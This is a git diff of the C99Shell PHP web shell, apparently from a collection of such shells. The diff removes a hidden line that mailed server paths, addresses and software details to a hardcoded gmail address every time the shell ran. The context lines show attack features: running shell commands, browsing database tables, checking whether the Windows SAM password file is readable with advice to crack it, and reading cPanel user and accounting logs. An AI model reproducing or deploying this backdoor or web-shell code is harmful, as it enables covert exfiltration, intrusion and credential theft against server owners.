diff --git a/php/C99Shell v. 1.0 pre-release build(safe-mode).php b/php/C99Shell v. 1.0 pre-release build(safe-mode).php index b6bbc4d..a6045bc 100644 --- a/php/C99Shell v. 1.0 pre-release build(safe-mode).php +++ b/php/C99Shell v. 1.0 pre-release build(safe-mode).php @@ -430,8 +430,6 @@ function myshellexec($cmd) return $result; } } -$sd98 = "john.barker446@gmail.com"; -$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists("view_perms")) { @@ -696,7 +694,7 @@ function mysql_query_form() if ($tbl_struct) { echo "Fields:
"; - foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
";} + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
";} echo ""; } } @@ -1000,7 +998,7 @@ if ($act == "sql") { echo "---[ ".htmlspecialchars($sql_db)." ]---
"; $c = 0; - while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;} + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } @@ -1296,7 +1294,7 @@ if ($act == "sql") $i++; } echo ""; - echo "
»
"; + echo "
»
"; echo "
".$i." table(s)
"; echo "".$trows.""; echo "".$row[1].""; @@ -1525,7 +1523,7 @@ if ($act == "security") { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
";} - else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
";} } if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";}